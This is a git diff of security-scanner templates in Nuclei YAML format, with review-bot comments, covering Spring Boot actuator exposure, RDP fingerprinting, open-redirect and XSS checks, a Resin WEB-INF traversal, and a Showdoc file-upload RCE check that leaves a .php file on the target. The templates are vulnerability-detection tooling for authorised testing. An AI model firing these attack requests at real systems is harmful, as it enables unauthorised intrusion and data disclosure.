@@ -0,0 +1,29 @@ +id: apache-filename-brute-force +info: + name: Apache Filename Brute Force + author: geeknik + description: If the client provides an invalid Accept header, the server will respond with a 406 Not Acceptable error containing a pseudo directory listing. + reference: | + - https://hackerone.com/reports/210238 + - https://www.acunetix.com/vulnerabilities/web/apache-mod_negotiation-filename-bruteforcing/ + severity: low + tags: apache + +requests: + - method: GET + headers: + Accept: "fake/value" + path: + - "{{BaseURL}}/index" + + matchers-condition: and + matchers: + - type: status + status: + - 406 + - type: word + words: + - "Not Acceptable" + - "Available variants:" + - "
Apache Server at" + condition: and diff --git a/misconfiguration/cloudflare-image-ssrf.yaml b/misconfiguration/cloudflare-image-ssrf.yaml new file mode 100644 index 0000000000..53750448b2 --- /dev/null +++ b/misconfiguration/cloudflare-image-ssrf.yaml @@ -0,0 +1,25 @@ +id: cloudflare-external-image-resize + +info: + name: Cloudflare External Image Resizing Misconfiguration + author: vavkamil + severity: info + description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin. + reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684 + tags: cloudflare,misconfig,oob + +requests: + - raw: + - | + GET /cdn-cgi/image/width/https://{{interactsh-url}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close + Accept: */* + Accept-Language: en + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" diff --git a/misconfiguration/springboot/springboot-configprops.yaml b/misconfiguration/springboot/springboot-configprops.yaml index 80d4670abd..ae33a1407f 100644 --- a/misconfiguration/springboot/springboot-configprops.yaml +++ b/misconfiguration/springboot/springboot-configprops.yaml @@ -5,6 +5,7 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: Sensitive environment variables may not be masked + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-env.yaml b/misconfiguration/springboot/springboot-env.yaml index a10ce723fc..986eb3f633 100644 --- a/misconfiguration/springboot/springboot-env.yaml +++ b/misconfiguration/springboot/springboot-env.yaml 
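Review bot: The new Cloudflare template's `id: cloudflare-external-image-resize` differs from its filename `cloudflare-image-ssrf.yaml`, whereas the other new templates in this commit use the filename as id; pick one spelling so `-id` lookups and the filename agree. The option segment in `GET /cdn-cgi/image/width/https://{{interactsh-url}}` gives `width` with no value, which (if the linked Cloudflare documentation still requires `option=value` pairs) may be rejected before any fetch is attempted; something like `/cdn-cgi/image/width=100/https://{{interactsh-url}}` is safer, hedged since I cannot check the docs from here. A comment above the request noting that a callback proves the origin fetched an arbitrary third-party URL would make the `oob` tag self-explanatory.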
@@ -3,8 +3,9 @@ id: springboot-env info: name: Detect Springboot Env Actuator author: that_juan_ & dwisiswant0 & wdahlenb - severity: high + severity: low description: Sensitive environment variables may not be masked + tags: springboot,disclosure requests: - method: GET @@ -17,8 +18,14 @@ requests: part: body words: - "applicationConfig" + + - type: word + part: body + words: + - "server.port" - "local.server.port" - condition: and + condition: or + - type: status status: - 200 diff --git a/misconfiguration/springboot/springboot-heapdump.yaml b/misconfiguration/springboot/springboot-heapdump.yaml index 6e544e8135..cd65105506 100644 --- a/misconfiguration/springboot/springboot-heapdump.yaml +++ b/misconfiguration/springboot/springboot-heapdump.yaml @@ -5,12 +5,15 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: critical description: Environment variables and HTTP requests can be found in the HPROF + tags: springboot,disclosure requests: - method: GET path: - "{{BaseURL}}/heapdump" - "{{BaseURL}}/actuator/heapdump" + + max-size: 2097152 # 2MB - Max Size to read from server response matchers-condition: and matchers: - type: binary @@ -20,16 +23,19 @@ requests: - "4850524f46" # "HPROF" - "1f8b080000000000" # Gunzip magic byte condition: or + - type: status status: - 200 + - type: word words: - "application/octet-stream" - "application/vnd.spring-boot.actuator" - "application/vnd.spring-boot.actuator.v1+json" - condition: or part: header + condition: or + - type: dsl dsl: - "len(body) >= 100000" diff --git a/misconfiguration/springboot/springboot-httptrace.yaml b/misconfiguration/springboot/springboot-httptrace.yaml index bd6d211c5d..0b00b04518 100644 --- a/misconfiguration/springboot/springboot-httptrace.yaml +++ b/misconfiguration/springboot/springboot-httptrace.yaml @@ -5,6 +5,7 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: View recent HTTP requests and responses + tags: springboot,disclosure requests: - method: GET 
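Review bot: In the added matcher, `server.port` is a substring of `local.server.port`, so the `or` list is equivalent to the single word `server.port` and the second entry never changes the outcome; keep one entry or use a token that is actually distinct. The severity drop from `high` to `low` also covers Spring Boot 1.x deployments where an exposed `/env` can accept property writes when management security is off, which is inferred rather than visible here, so `medium` with a comment such as `# read-only disclosure on Boot 2.x; writable on unsecured Boot 1.x` may be the safer middle ground.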
diff --git a/misconfiguration/springboot/springboot-loggers.yaml b/misconfiguration/springboot/springboot-loggers.yaml index d1e73b434f..b5fa03e536 100644 --- a/misconfiguration/springboot/springboot-loggers.yaml +++ b/misconfiguration/springboot/springboot-loggers.yaml @@ -4,6 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_ & dwisiswant0 & wdahlenb severity: low + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-mappings.yaml b/misconfiguration/springboot/springboot-mappings.yaml index 17e058f3e4..69630a8584 100644 --- a/misconfiguration/springboot/springboot-mappings.yaml +++ b/misconfiguration/springboot/springboot-mappings.yaml @@ -5,6 +5,7 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: Additional routes may be displayed + tags: springboot,disclosure requests: - method: GET diff --git a/misconfiguration/springboot/springboot-trace.yaml b/misconfiguration/springboot/springboot-trace.yaml index 170360f235..334673e33c 100644 --- a/misconfiguration/springboot/springboot-trace.yaml +++ b/misconfiguration/springboot/springboot-trace.yaml @@ -5,11 +5,13 @@ info: author: that_juan_ & dwisiswant0 & wdahlenb severity: low description: View recent HTTP requests and responses + tags: springboot,disclosure requests: - method: GET path: - "{{BaseURL}}/trace" + matchers-condition: and matchers: - type: word diff --git a/network/rdp-detect.yaml b/network/rdp-detect.yaml new file mode 100644 index 0000000000..c2d8bd5395 --- /dev/null +++ b/network/rdp-detect.yaml 
@@ -0,0 +1,59 @@ +id: rdp-detect + +info: + name: Windows RDP Detection + author: princechaddha + severity: info + tags: windows,rdp,network + +network: + - inputs: + - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" + type: hex + read-size: 2048 + + host: + - "{{Hostname}}" + - "{{Hostname}}:3389" + + matchers: + - type: word + encoding: hex + name: win2000 + words: + - "0300000b06d00000123400" + - type: word + encoding: hex + name: win2003 + words: + - "030000130ed000001234000300080002000000" + - type: word + encoding: hex + name: win2008 + words: + - "030000130ed000001234000200080002000000" + - type: word + encoding: hex + name: win7or2008R2 + words: + - "030000130ed000001234000209080002000000" + - type: word + encoding: hex + name: win2008R2DC + words: + - "030000130ed000001234000201080002000000" + - type: word + encoding: hex + name: win10 + words: + - "030000130ed00000123400021f080002000000" + - type: word + encoding: hex + name: win2012R2OR8 + words: + - "030000130ed00000123400020f080002000000" + - type: word + encoding: hex + name: win2016 + words: + - "030000130ed00000123400021f080008000000" diff --git a/technologies/detect-springboot-actuator.yaml b/technologies/detect-springboot-actuator.yaml deleted file mode 100644 index 25f0aec8ba..0000000000 --- a/technologies/detect-springboot-actuator.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: detect-springboot-actuator - -info: - name: Detect Springboot Actuators - author: that_juan_ & dwisiswant0 & wdahlenb - severity: info - -requests: - - method: GET - path: - - "{{BaseURL}}/actuator" - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"_links":{"self"' - - type: status - status: - - 200 diff --git a/technologies/springboot-actuator.yaml b/technologies/springboot-actuator.yaml new file mode 100644 index 0000000000..f93a1441df --- /dev/null +++ b/technologies/springboot-actuator.yaml 
@@ -0,0 +1,27 @@ +id: springboot-actuator + +info: + name: Detect Springboot Actuators + author: that_juan_ & dwisiswant0 & wdahlenb + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/actuator" + - "{{BaseURL}}/favicon.ico" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - '"_links":' + - '"self":' + - '"health"' + condition: and + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"116323821\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/technologies/wazuh-detect.yaml b/technologies/wazuh-detect.yaml new file mode 100644 index 0000000000..061429b6fd --- /dev/null +++ b/technologies/wazuh-detect.yaml @@ -0,0 +1,25 @@ +id: wazuh-detect + +info: + name: wazuh detect + author: cyllective + severity: info + description: Detects wazuh + tags: tech,wazuh + references: + - https://github.com/wazuh/wazuh + +requests: + - method: GET + path: + - "{{BaseURL}}/app/login" + + matchers: + - type: word + part: body + condition: or + words: + - '"id":"wazuh"' + - '"title":"Wazuh"' + - '"icon":"plugins/wazuh/img/icon_blue.png"' + - '"url":"/app/wazuh"' diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7dbb252efe..42b559c2d9 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -21,10 +21,7 @@ requests: - '{{BaseURL}}/example%E3%80%82com' - '{{BaseURL}}/%5Cexample.com' - '{{BaseURL}}/example.com' - - '{{BaseURL}}\example.com' - '{{BaseURL}}//example.com/' - - '{{BaseURL}}\/\/example.com/' - - '{{BaseURL}}%00\/\/example.com/' - '{{BaseURL}}/%00/example.com/' - '{{BaseURL}}/%09/example.com/' - '{{BaseURL}}/%0a/example.com/' 
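Review bot: The replacement `springboot-actuator` template has no `tags:` line, while every other springboot template touched in this commit gains `tags: springboot,disclosure`, so this one will be skipped by a `-tags springboot` run; add `tags: springboot,tech` under `severity: info`. The favicon DSL also has no path restriction, so a word match on `/favicon.ico` or a hash match on `/actuator` is accepted under `matchers-condition: or`; that is harmless but worth a comment, e.g. `# either path may satisfy either matcher; both are accepted`.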
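Review bot: The Wazuh template uses `references:` (plural) whereas every other template in this commit uses `reference:`, so the link is either ignored or, depending on how strict the loader is, rejected; change the key to `reference:` and keep the list form. The matcher words are all JSON fragments from the Kibana plugin config, which is fine, but `'"title":"Wazuh"'` alone is weak and the `condition: or` makes it sufficient; consider leaving that entry out or documenting why it is acceptable.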
@@ -33,14 +30,9 @@ requests:
 - '{{BaseURL}}/%5cexample.com/%2f%2e%2e'
 - '{{BaseURL}}@example.com'
 - '{{BaseURL}}/{{BaseURL}}example.com'
- - '{{BaseURL}}\{{BaseURL}}example.com'
 - '{{BaseURL}}//{{BaseURL}}example.com/'
- - '{{BaseURL}}\/\/{{BaseURL}}example.com/'
- - '{{BaseURL}}%00\/\/{{BaseURL}}example.com/'
 - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e'
 - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e'
- - '{{BaseURL}}/〱{{BaseURL}}example.com/%2f%2e%2e'
- - '{{BaseURL}}@{{BaseURL}}example.com'
 - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com'
 matchers:
 - type: regex
diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml
index 393f187037..a420339614 100644
--- a/vulnerabilities/generic/top-xss-params.yaml
+++ b/vulnerabilities/generic/top-xss-params.yaml
@@ -19,21 +19,21 @@ requests:
 matchers:
 - type: word
 words:
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
- - "\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
+ - "'>\""
 part: body
 condition: or
 
@@ -42,6 +42,14 @@ requests:
 - "text/html"
 part: header
 
+ - type: word
+ words:
+ - "Access Denied"
+ - "You don't have permission to access"
+ part: body
+ condition: and
+ negative: true
+
 - type: status
 status:
 - 200
diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
index 2f0a34d560..f2dbcccb45 100644
--- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
+++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml
@@ -5,6 +5,10 @@ info:
 author: emenalf & tirtha_mandal
 severity: critical
 tags: moodle,lfi
+ reference: |
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+ - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf

 requests:
 - method: GET
diff --git a/vulnerabilities/other/myucms-lfr.yaml b/vulnerabilities/other/myucms-lfr.yaml
index 421f0480b0..f7ecb3e8de 100644
--- a/vulnerabilities/other/myucms-lfr.yaml
+++ b/vulnerabilities/other/myucms-lfr.yaml
@@ -4,6 +4,7 @@ info:
 author: princechaddha
 severity: high
 tags: myucms,lfi
+ reference: https://blog.csdn.net/yalecaltech/article/details/104908257

 requests:
 - method: GET
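Review bot: The negative matcher added in the second hunk uses `condition: and`, so a response is discarded only when it contains both `Access Denied` and `You don't have permission to access`; a block page showing just one of them still passes and the template reports a finding. If the intent is to drop WAF/403 pages, use `condition: or`. In the first hunk the 15 rewritten `words` entries are all the same string `'>\"`, and under `condition: or` one entry is equivalent, so the list can shrink to a single line.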
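Review bot: The context line `tags: moodle,lfi` does not fit an Oracle E-Business Suite template and looks like a copy-paste leftover that this commit leaves in place; tag-driven workflows would route this check alongside Moodle templates. Suggest `tags: oracle,ebs,lfi` (keeping `lfi`, which is presumably intended). Separately, `reference: |` turns the three URLs into one multi-line string whose lines begin with `- `, not a YAML sequence — the same construct appears in the `nuuo-nvrmini2-rce`, `resin-cnnvd-200705-315` and `springboot-actuators-jolokia-xxe` hunks; if the loader expects a list, drop the `|`.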
diff --git a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
index 1757042c9e..8346865b45 100644
--- a/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
+++ b/vulnerabilities/other/nuuo-nvrmini2-rce.yaml
@@ -1,15 +1,14 @@
 id: nuuo-nvrmini2-upgradehandlephp-rce

 info:
- name: NUUO NVRmini2 3.0.8 - Remote Code Execution
+ name: NUUO NVRmini 2 3.0.8 - Remote Code Execution
 author: berkdusunur
 severity: critical
 tags: rce
-
- # Reference:-
- # https://www.exploit-db.com/exploits/45070
- # https://github.com/berkdsnr/NUUO-NVRMINI-RCE
- # https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html
+ reference: |
+ - https://www.exploit-db.com/exploits/45070
+ - https://github.com/berkdsnr/NUUO-NVRMINI-RCE
+ - https://packetstormsecurity.com/files/151573/NUUO-NVRmini-upgrade_handle.php-Remote-Command-Execution.html

 requests:
 - method: GET
@@ -18,8 +17,8 @@ requests:

 matchers-condition: and
 matchers:
- - type: regex
- regex:
+ - type: word
+ words:
 - "/upload_tmp_dir/"
 part: body
 
diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml
index 6e1d292f89..b008ebe22d 100644
--- a/vulnerabilities/other/oa-v9-uploads-file.yaml
+++ b/vulnerabilities/other/oa-v9-uploads-file.yaml
@@ -1,9 +1,10 @@
 id: oa-v9-uploads-file

 info:
- name: OA V9 Uploads File
+ name: OA V9 RCE via File Upload
 author: pikpikcu
 severity: high
+ description: A vulnerability in OA V9 uploadOperation.jsp endpoint allows remote attackers to upload arbitrary files to the server. These files can be subsequently called and are executed by the remote software.
 reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
 tags: rce,jsp
 
diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml
index c898de0884..427bf5239a 100644
--- a/vulnerabilities/other/powercreator-cms-rce.yaml
+++ b/vulnerabilities/other/powercreator-cms-rce.yaml
@@ -4,7 +4,7 @@ info:
 name: PowerCreator CMS RCE
 author: pikpikcu
 severity: critical
- reference: http://www.mstir.cn/index.php/2020/11/18/powercreatorcms-rce/
+ reference: https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/PowerCreatorCms/PowerCreatorCms%E4%BB%BB%E6%84%8F%E4%B8%8A%E4%BC%A0/
 tags: rce,powercreator

 requests:
diff --git a/vulnerabilities/other/rce-via-java-deserialization.yaml b/vulnerabilities/other/rce-via-java-deserialization.yaml
deleted file mode 100644
index 558d7d240b..0000000000
--- a/vulnerabilities/other/rce-via-java-deserialization.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: rce-via-java-deserialization
-info:
- name: Java Deserialization [RCE]
- author: uhnysh
- severity: critical
- tags: java,rce
- reference: https://www.synopsys.com/blogs/software-security/mitigate-java-deserialization-vulnerability-jboss/
-
- # This can only be used to detect the vuln, please make sure to run ysoserial over the URLs to verify.
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/josso/%5C../invoker/EJBInvokerServlet/"
- - "{{BaseURL}}/josso/%5C../invoker/JMXInvokerServlet/"
- - "{{BaseURL}}/invoker/JMXInvokerServlet/"
- - "{{BaseURL}}/invoker/EJBInvokerServlet/"
- matchers:
- - type: word
- words:
- - "org.jboss.invocation.MarshalledValue"
- - "java.lang"
- condition: and
diff --git a/vulnerabilities/other/resin-cnnvd-200705-315.yaml b/vulnerabilities/other/resin-cnnvd-200705-315.yaml
new file mode 100644
index 0000000000..e35605cb4b
--- /dev/null
+++ b/vulnerabilities/other/resin-cnnvd-200705-315.yaml
@@ -0,0 +1,25 @@
+id: resin-cnnvd-200705-315
+info:
+ name: Caucho Resin Information Disclosure
+ author: princechaddha
+ severity: high
+ reference: |
+ - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315
+ tags: resin,caucho,lfr
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/%20../web-inf/"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "/ ../web-inf/"
+ - "Directory of /"
+ condition: and
+ part: body
diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml
new file mode 100644
index 0000000000..a83e353f93
--- /dev/null
+++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml
@@ -0,0 +1,47 @@
+id: showdoc-file-upload-rce
+info:
+ name: Showdoc < 2.8.6 File Upload RCE
+ author: pikpikcu
+ severity: critical
+ reference: https://github.com/star7th/showdoc/pull/1059
+ tags: rce,fileupload,showdoc
+
+requests:
+ - raw:
+ - |
+ POST /index.php?s=/home/page/uploadImg HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+ Content-Length: 239
+ Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
+ Accept-Encoding: gzip
+
+ ----------------------------835846770881083140190633
+ Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
+ Content-Type: text/plain
+
+
+ ----------------------------835846770881083140190633--
+
+ - |
+ GET /Public/Uploads{{url_decode("§path§")}} HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+
+ extractors:
+ - type: regex
+ name: path
+ group: 1
+ internal: true
+ part: body
+ regex:
+ - '/Uploads\\(.*?)"\,"success"'
+
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "PHP Extension")'
+ - 'contains(body_2, "PHP Version")'
+ - 'status_code_2 == 200'
+ condition: and
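Review bot: `info` has no `description`, and nothing explains why a directory listing rates `severity: high`; the path `/%20../web-inf/` together with the `Directory of /` matcher shows this is a WEB-INF listing reached through an encoded-space prefix, so add `description: Caucho Resin returns a directory listing of WEB-INF when the request path is prefixed with an encoded space ("%20../"), exposing the contents of WEB-INF.` The `lfr` tag also overstates what the matchers check, which is a listing rather than file contents.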
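Review bot: The multipart file part between `Content-Type: text/plain` and the closing boundary is empty as this hunk renders, yet the `dsl` matcher expects `PHP Extension` and `PHP Version` in `body_2`, which only a phpinfo-style payload would produce; if the committed body really is empty the template can never match (if the page merely stripped the payload, disregard). The template also leaves a `.php` file under `/Public/Uploads` on the target and never deletes it, which `info` should state, e.g. `description: Confirms unauthenticated file upload in Showdoc < 2.8.6 by uploading a file and requesting it back; the uploaded file is not removed.` The hard-coded `Content-Length: 239` will be wrong if the body is edited — confirm whether the engine recomputes it for raw requests.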
diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index 3122baac6e..d6b61f02fa 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,7 +4,10 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0 severity: high - description: todo + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: | + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit tags: springboot,jolokia,xxe requests: diff --git a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index 35edb25e89..4a9a1ee7e9 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -9,14 +9,19 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E" + - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" + matchers-condition: and matchers: - type: word words: - - "" + - "'>\"" part: body - type: word words: - "text/html" - part: header \ No newline at end of file + part: header + + - type: status + status: + - 200 \ No newline at end of file diff --git a/workflows/cisco-asa-workflow.yaml b/workflows/cisco-asa-workflow.yaml index 1cfe3751a3..455eb68e1c 100644 --- a/workflows/cisco-asa-workflow.yaml +++ b/workflows/cisco-asa-workflow.yaml 
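Review bot: The new `description` line has typos — `Actuators's` should be `Actuator's` and `preform` should be `perform` — and the clause `include content stored on a remote server as if it was its own` is unclear; `read local files or fetch attacker-controlled remote content` says what the XXE does more plainly. The rest of the template is outside this hunk.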
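Review bot: The replacement word matcher `'>\"` fires on any HTML body containing those three characters, not only on a reflection of the `file` parameter, so even with the new `matchers-condition: and` and the 200 check the template still reports unrelated pages; match the decoded `file` value from the request path instead of the generic fragment. The file is still committed without a trailing newline (`\ No newline at end of file`).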
@@ -16,5 +16,4 @@ workflows:
 subtemplates:
 - template: cves/2020/CVE-2020-3187.yaml
 - template: cves/2020/CVE-2020-3452.yaml
- - template: cves/2018/CVE-2018-0296.yaml
- - template: cves/2018/CVE-2018-0101.yaml
\ No newline at end of file
+ - template: cves/2018/CVE-2018-0296.yaml
\ No newline at end of file
diff --git a/workflows/ruijie-workflow.yaml b/workflows/ruijie-workflow.yaml
index 4cf6d3b166..5ba69854c5 100644
--- a/workflows/ruijie-workflow.yaml
+++ b/workflows/ruijie-workflow.yaml
@@ -11,3 +11,4 @@ workflows:
 - template: vulnerabilities/other/ruijie-networks-rce.yaml
 - template: exposures/configs/ruijie-information-disclosure.yaml
 - template: exposures/configs/ruijie-smartweb-disclosure.yaml
+ - template: exposures/configs/ruijie-phpinfo.yaml
diff --git a/workflows/springboot-workflow.yaml b/workflows/springboot-workflow.yaml
index 3f3d692b03..290205834d 100644
--- a/workflows/springboot-workflow.yaml
+++ b/workflows/springboot-workflow.yaml
@@ -11,11 +11,12 @@ info:


 workflows:
- - template: technologies/detect-springboot-actuator.yaml
+ - template: technologies/springboot-actuator.yaml
 subtemplates:
 - template: misconfiguration/springboot/springboot-configprops.yaml
 - template: misconfiguration/springboot/springboot-env.yaml
 - template: misconfiguration/springboot/springboot-heapdump.yaml
+ - template: misconfiguration/springboot/springboot-httptrace.yaml
 - template: misconfiguration/springboot/springboot-loggers.yaml
 - template: misconfiguration/springboot/springboot-mappings.yaml
 - template: misconfiguration/springboot/springboot-trace.yaml
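Review bot: The trigger template renamed here, `technologies/springboot-actuator.yaml`, is rewritten in this commit with `matchers-condition: or` and a favicon-hash branch, so the `subtemplates` (`springboot-env`, `springboot-heapdump`, …) now run against any host whose favicon matches even when `/actuator` returned nothing; if that widening is unintended, the favicon matcher should not gate the workflow. `misconfiguration/springboot/springboot-httptrace.yaml` is added to the list but does not appear in the visible diff — confirm it exists in this commit.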